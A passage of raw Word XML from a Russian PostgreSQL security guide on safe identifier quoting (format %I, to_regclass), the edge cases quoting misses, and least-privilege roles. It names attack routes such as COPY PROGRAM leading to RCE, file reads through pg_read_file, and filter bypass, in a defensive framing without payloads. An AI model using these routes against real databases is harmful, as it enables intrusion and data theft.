    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Распространённая ошибка — обрабатывать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema.table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> одним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 Неверно: процитирует "public.users" как ОДИН identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %I', 'public.users');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Сервер ищет таблицу с буквальным именем "public.users" (с точкой) — error.</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Верно: разделить schema и table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %I.%I', schema, table);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это особенно важно при работе с user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema.table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строкой — сначала split на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затем каждую часть через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Альтернатива — использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_regclass()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для парсинга:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- to_regclass возвращает OID, гарантирует существование таблицы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF to_regclass(user_input) IS NULL THEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAISE EXCEPTION 'Invalid table';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END IF;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %s', to_regclass(user_input)::text);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_regclass()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сам делает всё необходимое цитирование и проверяет existence. Если table не существует — возвращает NULL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Edge cases с `quote_ident()` / `%I`, которые не закрываются</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Invisible Unicode / homoglyphs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий регистрирует пользователя с именем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">аdmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с кириллической </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">а</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), потом requests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', user_name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> процитирует identifier корректно — но коллизия с настоящим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уже произошла на уровне приложения. Защита — нормализация Unicode в application layer + whitelist на charset (только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[a-zA-Z0-9_]</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Case-sensitive vs case-insensitive identifiers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format('%I', 'USERS')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даёт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 case-sensitive lookup.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без кавычек резолвится в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(lowercase). Атакующий может через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найти таблицу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"Users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, недоступную через bare name. Защита — нормализация case в whitelist.</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Reserved words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format('%I', 'select')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работает, но указывает на potential confusion. Whitelist на keywords уменьшает поверхность.</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Внутри string-literal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не помогает, если результат потом попадает в строковый literal — потребуется double-escape (см. 3.16.2). Лучше избегать таких контекстов через переход на параметризацию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с другими разделами 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5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для значений; этот раздел — для identifier.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наименьшие привилегии: если application-роль не имеет прав на чужие таблицы, даже identifier injection не даёт доступа.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — helper-библиотеки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg.sql.SQL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pgx.Identifier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pg-format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) делают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-эквивалентное цитирование на client-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с категориями 3.X.N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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identifier injection в plpgsql — основная категория, эксплуатирующая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s')</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Подразделы 3.16.1, 3.16.2 разбирают конкретные сценарии.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3.14.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY column_name — whitelist предпочтительнее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потому что ограничивает не только синтаксис, но и список разрешённых колонок.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3.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Filter bypass — атакующий через dollar-quoted strings (R5) обходит фильтры; цитирование через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%L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сужает векторы, но не закрывает все обходы WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что не закрывает identifier-цитирование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DDL от роли с CREATE-правами на чужие схемы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — даже корректно процитированный identifier даёт доступ к чужой таблице, если grant-ы это позволяют. Защита — 5.3 (наименьшие привилегии).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R12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2023-2454 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обходит protective search_path;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не защищает потому что атака на уровне DDL-обработки, не на уровне identifier escaping.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Race conditions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: между </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_regclass()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверкой и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атакующий может изменить object → TOCTOU. В практике редко, но возможно для DDL операций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Наименьшие привилегии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметризация (5.1) и identifier-цитирование (5.2) защищают от того, что атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сможет написать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в SQL. Принцип наименьших привилегий защищает от того, что атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сможет сделать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с базой, даже если injection прошла. Часть категорий 3.X — особенно 3.6 (OOB/SSRF/file-read), 3.7 (RCE), 3.13 (priv-esc) — структурно требуют privilege-levels, недоступных application-роли. Если application-роль их не имеет, эксплуатация невозможна независимо от качества кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Application role: что НЕ давать</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандартная application-роль обычно нуждается в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на конкретные таблицы своей схемы. Остальное — отдельное обоснование.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Никогда: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SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — полный доступ ко всему, обход всех проверок. Никогда не для application.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 — game-over для multi-tenant deployments. Только для super-admin tooling.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 открывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → RCE (см. 3.7.1).</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 открывают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_file()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lo_import()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → file leak / file write (см. 3.6.3, 3.6.4).</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pg_write_all_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bypass per-table ACL; один grant даёт SELECT на всё (см. 2.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Редко / только с обоснованием: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REPLICATION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pg_create_subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
